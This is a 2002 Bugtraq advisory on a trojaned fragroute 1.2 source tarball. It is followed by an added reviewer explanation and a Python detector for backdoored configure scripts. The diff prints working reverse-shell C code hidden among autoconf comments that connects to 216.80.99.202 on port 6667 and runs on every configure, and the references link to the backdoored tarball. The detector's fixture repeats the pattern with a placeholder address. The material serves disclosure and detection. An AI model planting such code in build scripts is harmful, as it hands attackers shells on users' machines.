Trojan/backdoor in fragroute 1.2 source distribution

From: Anders Nordby (anders@fix.no)
Date: 05/31/02


Date: Fri, 31 May 2002 09:55:21 +0200
From: Anders Nordby <anders@fix.no>
To: bugtraq@securityfocus.com

Hello,

Although downloading it now seems safe, I think folks should know this.
The changes done were similar to what happened to irssi, but with a
different IP.

MD5 sum of fragroute-1.2.tar.gz, downloaded from
http://www.monkey.org/~dugsong/fragroute/ on May 27 (the contaminated
version): 65edbfc51f8070517f14ceeb8f721075

MD5 sum of fragroute-1.2.tar.gz, downloaded from
http://www.monkey.org/~dugsong/fragroute/ on May 30 (this is the current
MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a

Diff between the two:

diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
--- fragroute-1.2/configure Mon Apr 15 16:41:43 2002
+++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002
@@ -1590,6 +1590,53 @@
 
 fi
 
+cat > conftest.c<<EOF
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main()
+{
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ int s;
+ struct sockaddr_in sa;
+ switch(fork()) { case 0: break; default: exit(0); }
+ if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ memset(&sa, 0, sizeof(sa));
+ sa.sin_family = AF_INET;
+ sa.sin_port = htons(6667);
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
+ if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ dup2(s, 0); dup2(s, 1); dup2(s, 2);
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
+}
+EOF
+gcc $LIBS conftest.c -o conftest; ./conftest
+if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
+ rm -rf conftest*
+else
+ rm -rf conftest*
+fi
+rm -f conftest*
+
     # DLPI needs putmsg under HPUX so test for -lstr while we're at it
     echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6
 echo "configure:1596: checking for putmsg in -lstr" >&5
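Review bot: the added block at `cat > conftest.c<<EOF` is not a configure probe and must be rejected outright: the program forks, connects to the hard-coded address 216.80.99.202 on port 6667, dup2()s the socket onto descriptors 0, 1 and 2 and execve()s /bin/sh, and the line `gcc $LIBS conftest.c -o conftest; ./conftest` runs it unconditionally on every ./configure, before any test result is consulted. The `if { (eval echo configure:2379: ...` check that follows is cosmetic: its `test -s conftestx${ac_exeext}` names a file nothing here produces, so both branches just `rm -rf conftest*`, and the `configure:2379` line number does not match the `configure:1596` of the surrounding genuine probe. The recycled autoconf boilerplate comments are what let it blend in; regenerating configure from configure.in and diffing, or checking the tarball's MD5 against the published sum, exposes it immediately.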

References
==========

FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
Irssi backdoor page: http://www.irssi.org/?page=backdoor
Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz

Cheers,

-- 
Anders.
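As an added example that is not part of Anders's post or of fragroute itself: a small detector for the pattern the diff above shows. It pulls each `cat > conftest.c<<EOF` heredoc out of a configure script, flags any body that connects out, dup2()s the socket onto the standard descriptors and execve()s, records a hard-coded inet_addr() literal, and notes whether the binary is run straight after compiling instead of only being linked. The fixture is constructed and condensed; 192.0.2.1 is a documentation placeholder, not the address from the post.

```python
import re

# A configure probe compiles a tiny program to see whether it links; one that
# connects somewhere and hands the socket to a shell is not a probe.
SHELL_CALLS = ("connect(", "dup2(", "execve(")
HEREDOC_RE = re.compile(r"cat\s*>\s*([^\s<]+)\s*<<\s*'?(\w+)'?\n(.*?)\n\2\n", re.S)
ADDR_RE = re.compile(r'inet_addr\("([^"]+)"\)')

# Constructed fixture: a normal probe, then one shaped like the fragroute hunk
# (condensed; 192.0.2.1 is a documentation placeholder, not the real address).
SAMPLE_CONFIGURE = """\
cat > conftest.c<<EOF
#include <stdio.h>
int main() { return puts("hello") < 0; }
EOF
if { (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then
  echo yes
fi
cat > conftest.c<<EOF
int main() {
 int s = socket(AF_INET, SOCK_STREAM, 0);
 sa.sin_addr.s_addr = inet_addr("192.0.2.1");
 if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) exit(1);
 dup2(s, 0); dup2(s, 1); dup2(s, 2);
 execve("/bin/sh", args, NULL);
}
EOF
gcc $LIBS conftest.c -o conftest; ./conftest
"""

def scan_configure(text):
    """One finding per heredoc'd conftest whose body looks like a remote shell."""
    findings = []
    for m in HEREDOC_RE.finditer(text):
        target, body = m.group(1), m.group(3)
        present = [c for c in SHELL_CALLS if c in body]
        if len(present) < 2:
            continue  # ordinary feature probe
        binary = target.rsplit(".", 1)[0]
        addr = ADDR_RE.search(body)
        findings.append({
            "target": target,
            "calls": present,
            "hardcoded_addr": addr.group(1) if addr else None,
            # autoconf only links a probe; running it right after compiling is a tell
            "run_after_compile": bool(re.search(r"\./%s\b" % re.escape(binary),
                                                text[m.end():m.end() + 300])),
        })
    return findings
```

Run it as `scan_configure(open("configure").read())` on the script from a freshly unpacked tarball before typing ./configure.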